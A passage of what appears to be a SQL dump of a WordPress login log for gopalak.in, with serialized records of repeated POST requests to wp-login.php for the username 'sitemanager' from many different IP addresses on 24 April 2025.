RY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745468540.3336909;s:12:\"REQUEST_TIME\";i:1745468540;}}','199.188.200.73',0,'2025-04-24 09:52:22','1970-01-01 00:00:00'),(94041,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35082\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.209.103\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745468882.2802279;s:12:\"REQUEST_TIME\";i:1745468882;}}','162.0.209.103',0,'2025-04-24 09:58:04','1970-01-01 00:00:00'),(94042,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35034\";s:11:\"REMOTE_ADDR\";s:14:\"103.90.232.143\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745469213.4459751;s:12:\"REQUEST_TIME\";i:1745469213;}}','103.90.232.143',0,'2025-04-24 10:03:35','1970-01-01 00:00:00'),(94043,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60770\";s:11:\"REMOTE_ADDR\";s:13:\"14.160.24.238\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745469554.7072339;s:12:\"REQUEST_TIME\";i:1745469554;}}','14.160.24.238',0,'2025-04-24 10:09:16','1970-01-01 00:00:00'),(94044,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36894\";s:11:\"REMOTE_ADDR\";s:12:\"78.47.178.44\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745469894.5032859;s:12:\"REQUEST_TIME\";i:1745469894;}}','78.47.178.44',0,'2025-04-24 10:14:56','1970-01-01 00:00:00'),(94045,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40990\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.201.234\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745470244.8127279;s:12:\"REQUEST_TIME\";i:1745470244;}}','199.188.201.234',0,'2025-04-24 10:20:46','1970-01-01 00:00:00'),(94046,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54698\";s:11:\"REMOTE_ADDR\";s:13:\"68.65.122.219\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745470584.051028;s:12:\"REQUEST_TIME\";i:1745470584;}}','68.65.122.219',0,'2025-04-24 10:26:25','1970-01-01 00:00:00'),(94047,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41868\";s:11:\"REMOTE_ADDR\";s:12:\"94.23.61.165\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745470925.5270841;s:12:\"REQUEST_TIME\";i:1745470925;}}','94.23.61.165',0,'2025-04-24 10:32:07','1970-01-01 00:00:00'),(94048,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58150\";s:11:\"REMOTE_ADDR\";s:13:\"185.61.152.50\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745471267.8070929;s:12:\"REQUEST_TIME\";i:1745471267;}}','185.61.152.50',0,'2025-04-24 10:37:49','1970-01-01 00:00:00'),(94049,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:83:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45190\";s:11:\"REMOTE_ADDR\";s:12:\"23.239.27.53\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745471610.419349;s:12:\"REQUEST_TIME\";i:1745471610;}}','23.239.27.53',0,'2025-04-24 10:43:32','1970-01-01 00:00:00'),(94050,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48904\";s:11:\"REMOTE_ADDR\";s:15:\"158.106.139.211\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745471951.0404799;s:12:\"REQUEST_TIME\";i:1745471951;}}','158.106.139.211',0,'2025-04-24 10:49:12','1970-01-01 00:00:00'),(94051,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 